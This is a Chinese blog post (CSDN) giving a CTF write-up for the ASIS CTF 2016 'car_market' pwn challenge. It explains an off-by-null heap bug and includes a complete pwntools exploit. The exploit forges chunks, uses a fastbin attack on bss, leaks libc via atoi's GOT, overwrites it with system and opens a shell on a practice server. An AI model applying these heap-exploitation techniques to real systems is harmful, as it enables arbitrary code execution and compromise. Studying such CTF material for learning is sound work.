car_market_asis_ctf_2016

最新推荐文章于 2024-07-24 10:35:36 发布
最新推荐文章于 2024-07-24 10:35:36 发布
阅读量317 收藏
点赞数
分类专栏: pwn 二进制漏洞 CTF 文章标签: 安全 PWN CTF 二进制漏洞 缓冲区溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/107568184
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

car_market_asis_ctf_2016

首先,检查一下程序的保护机制

然后,我们用IDA分析一下,程序功能比较多,这里不做分析了。

漏洞点在这,输入函数存在off by null。

该函数在set_customer_name里调用

可以将comment指针的低1字节覆盖

这样,我们只需要在对应的位置伪造好chunk,然后free掉形成overlap chunk即可控制,构造麻烦了点,为了能够通过fastbin attack申请到bss上控制堆指针,我们还需要利用count来伪造成chunk的size

#coding:utf8
from pwn import *

#sh = process('./car_market_asis_ctf_2016',env={'LD_PRELOAD':'./libc-2.23.so'})
sh = remote('node3.buuoj.cn',29774)
elf = ELF('./car_market_asis_ctf_2016')
libc = ELF('./libc-2.23.so')
atoi_got = elf.got['atoi']

def add_car(model,price):
   sh.sendlineafter('>','2')
   sh.sendlineafter('model',model)
   sh.sendlineafter('price',str(price))

def delete_car(index):
   sh.sendlineafter('>','3')
   sh.sendlineafter('index',str(index))

def show():
   sh.sendlineafter('>','1')

def select_car(index):
   sh.sendlineafter('>','4')
   sh.sendlineafter('index',str(index))

def add_customer():
   sh.sendlineafter('>','4')

def set_model(model):
   sh.sendlineafter('>','2')
   sh.sendafter('model',model)

def set_price(price):
   sh.sendlineafter('>','3')
   sh.sendlineafter('price',str(price))

def set_customer_name(name):
   sh.sendlineafter('>','1')
   sh.sendafter('name :',name)

def set_customer_comment(comment):
   sh.sendlineafter('>','3')
   sh.sendafter('coment :',comment)


add_car('a'*0x9,10) #0
select_car(0)
add_customer()
set_customer_comment('b'*0x40 + '\n')
sh.sendlineafter('>','4')
sh.sendlineafter('>','5')

#伪造一个chunk
add_car(p64(0) + p64(0x51),10) #1
select_car(1)
add_customer()
set_customer_comment('d'*0x40 + '\n')
#null off by one修改堆指针指向fake_chunk
set_customer_name(p64(0) + p64(0x21) + 'e'*0x10)
sh.sendlineafter('>','4')
sh.sendlineafter('>','5')

for i in range(0x51-2): #使得count增加为0x51,这样可以作为fake_chunk的size
   add_car('f'*0x9,10)

fake_chunk_in_bss = 0x00000000006020B8
#free掉fake_chunk
select_car(1)
add_customer()
sh.sendlineafter('>','4')
set_price(fake_chunk_in_bss) #将bss上的fake_chunk连接上去
sh.sendlineafter('>','5')


select_car(2)
add_customer()
#申请到bss上,控制堆指针数组,实现任意地址读写
fake_struct = p64(atoi_got-0x8) + p64(0) + p64(0) + '\n'
set_customer_comment(p64(0x00000000006020D0) + fake_struct)
sh.sendlineafter('>','4')
sh.sendlineafter('>','5')

select_car(0)
show()
sh.recvuntil('Model  : ')
libc_base = u64(sh.recv(6).ljust(8,'\x00')) - libc.sym['_IO_setvbuf']
system_addr = libc_base + libc.sym['system']
print 'libc_base=',hex(libc_base)
print 'system_addr=',hex(system_addr)
set_model(p64(0) + p64(system_addr)) #修改atoi的got表
#getshell
sh.sendlineafter('>','/bin/sh')


sh.interactive()

 

ha1vk
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Asis CTF 2016 b00ks(堆溢出NULL byte off-by-one)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-21 1416
Asis CTF 2016 b00ks1.题目获取2.查保护3.分析程序4.地址泄露泄露地址修改地址5.伪造结构体 1.题目获取 题目下载地址:点此下载 2.查保护 3.分析程序 IDA载入,查看main函数 这个函数读取一个名字,最长32个字节。 作者名被读到data段 sub_A89()打印程序功能,并获取用户输入的序号 sub_F55()的功能是添加书籍信息,在这个函数中可以分析到...
Asis CTF 2016 b00ks
Morphy_Amo的博客
02-22 3403
例题 Asis CTF 2016 b00ks ` 题目链接 1. 安全策略 [*] '/root/ctf/Other/pwn/heap/b00ks' Arch: amd64-64-little RELRO: Full RELRO Stack: No canary found NX: NX enabled PIE: PIE enabled 开启了full RELRO,因此无法直接进行GOT表劫持。开启了PIE,也导致不能直接用
[Asis CTF 2016] b00ks —— Off-By-One笔记与思考
Tokameine的博客
09-13 1292
前言: 这道题做得有点痛苦......因为本地通常都很难和服务器有相同的环境,使用mmap开辟空间造成的偏移会因此而变得麻烦,并且free_hook周围很难伪造chunk,一度显然恐慌...... 不过本来应该很早就开始Off-By-One的学习的,竟然现在才注意到......惭愧 正文: book结构: struct book { int id; char *name; char *description; in...
堆溢出off-by-one(asis-ctf-2016 pwn 之 b00ks)
九层台
08-01 2317
这些天积累也知道了一些关于glibc内存的分配策略。 说pwn 是在内存里捉迷藏其实到这里才真正接触大片的内存。精确控制就能保证精确修改数据。 需要的一个很重要的能力就是跟内存的能力。 这里调试exp用gdb.attach(p)来下断点,弹出调试界面。跟踪内存。 用gdb的x命令/xg参数来查看内存以十六进制8字节显示。 这个程序开启了PIE跟踪不太容易,不过可以用find命令查找输入的...
tomcat_apache共享动态连接库
09-03
LoadModule asis_module modules/mod_asis.so LoadModule info_module modules/mod_info.so LoadModule cgi_module modules/mod_cgi.so LoadModule dav_fs_module modules/mod_dav_fs.so LoadModule vhost_alias_...
LIN_v2.0中文版.pdf
05-03
本规范是在“ASIS”的基础上形成的,不可以作为任何索赔的依据。© LIN 协会2003. 版权所有。未经授权的复印、演示、或对本文件其他方面的使用,都是违反法律和知识产权的。LIN是一个注册商标®. 本文件的任何分发都...
visual asisit2283_2
09-06
最新的visual asisit 番茄小工具(官网工具,非破解版)
CAD_Import_VCL_6.1.rar_3d cad_CAD Import vcl 6.1_brep_cad_iges
09-24
Support of 3D formats: STEP, IGES, STL, ASIS SAT and BREP; Tsg3DNavigator component for displaying 3D files; - Processing of splitted line types is improved.
axis-std&Axis2_Service_Archiver
03-05
在这个上下文中,“asis2-std”可能是“Axis2 Standard”的误拼,我们通常将其理解为Axis2的标准版。标准版通常包含了基本的Web服务功能,而没有额外的插件或模块。开发者可能使用这个版本来构建基本的服务,然后...
ASISCTFQuals2015的writeups
HappyOrange2014的专栏
05-14 1867
本文将记录ASISCTF2015年度预选赛题目的writeup。我会先放出在比赛中做出的部分简单题目的解题思路,其他题目我也会在复盘后不定期更新,以保证所有题目都是独立完成,权当个人学习笔记了。 ps:在线题目由于比赛结束,已经关闭;离线分析的题目可以去[https://github.com/ctfs/write-ups-2015]下载,那里有更多题目的writeups。Keka Bomb(Poi
渗透测试——BlackMarket
D-R0s1的博客
11-16 2693
第一步:主机发现(找到渗透靶机的ip,使用工具为netdiscover,nmap) 在kali中使用命令安装netdiscover:apt install netdiscover 命令:netdiscover 默认扫描局域网内所有机器,这样的话扫描的是B类地址,所以时间会比较慢。我们也可以直接使用 命令:netdiscover -i eth0 -r 192.168.1.1/24 -i是...
i春秋CTF答题赛(第三季)WriteUp
SkYe's Blog
12-02 1621
i春秋CTF答题赛(第三季)WriteUp 文章首发于我的博客:https://mrskye.cn Re 幸运数字 分析 main 函数得出,只要输入的值经过加密转换之后等于H5wg_2g_MCif_T1ou_v7v7v,就会返回真正 flag 。加密算法只针对字符串中的英文字符。 分析中间加密部分可知,如果密文是大写字母,那么明文也是大写字母;小写字母同理。如果想检验的下面给出加密部分的 ...
Asis CTF 2013: "RSAng"
Gunther的博客
08-12 2245
Writeup author:Gunther Task text: This message is encrypted using the prime factors of N. Decrypt the message. N = 1364632961431908932486082704484934393506831154926808761680520840535043478
Asis CTF 2016——b00ks
04-18 361
这程序是一个图书管理系统  #off-by-one 程序逻辑 1 __int64 __fastcall main(__int64 a1, char **a2, char **a3) 2 { 3 struct _IO_FILE *v3; // rdi 4 __int64 savedregs; // [rsp+20h] [rbp+0h] 5 6 ...
i春秋网络内生试验场CTF答题夺旗赛(第三季)WP
李熠专用博客_白帽子一枚,人称低危终结者
11-30 2455
0x01 weak 依次点击管理平台->跳转到测试页,可看到测试页代码,可知是一道MD5弱类型的题,只需要找到MD5加密出来为0e,并且用户名和密码不相等且不为数字的即可,笔者已找到两个符合条件的明文,分别是:QNKCDZO和aabg7XSs,回到管理页,用户名和密码分别输入可得flag。 0x02 Electrical System 逆向分析程序可知,这是一个栈溢出的题,编写exp如下:...
微软蓝屏事件引发对构建更加稳固和安全的网络环境的思考
最新发布
lupai的博客
07-24 474
综上所述,构建更加稳固和安全的网络环境需要政府、企业和用户共同努力,从政策、技术、用户行为等多个方面入手,形成全方位、多层次的网络安全防护体系。构建更加稳固和安全的网络环境是一个系统工程,需要从多个方面入手,包括政策、技术、用户行为等多个层面。建立完善的应急响应机制,制定应急预案和演练计划,提高应对网络攻击和突发事件的能力。鼓励和支持网络安全技术的研发和创新,推动新技术在网络安全领域的应用和推广。加强对用户的网络安全教育,提高用户的网络安全意识和防范能力。
TopoDS_Compound导出文件
03-06
writer.Transfer(compound, STEPControl_AsIs); // 设置输出文件名 writer.SetFileName("output.step"); // 执行写入操作 writer.Write(); return 0; } ``` 这段示例代码创建了一个TopoDS_Compound对象,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值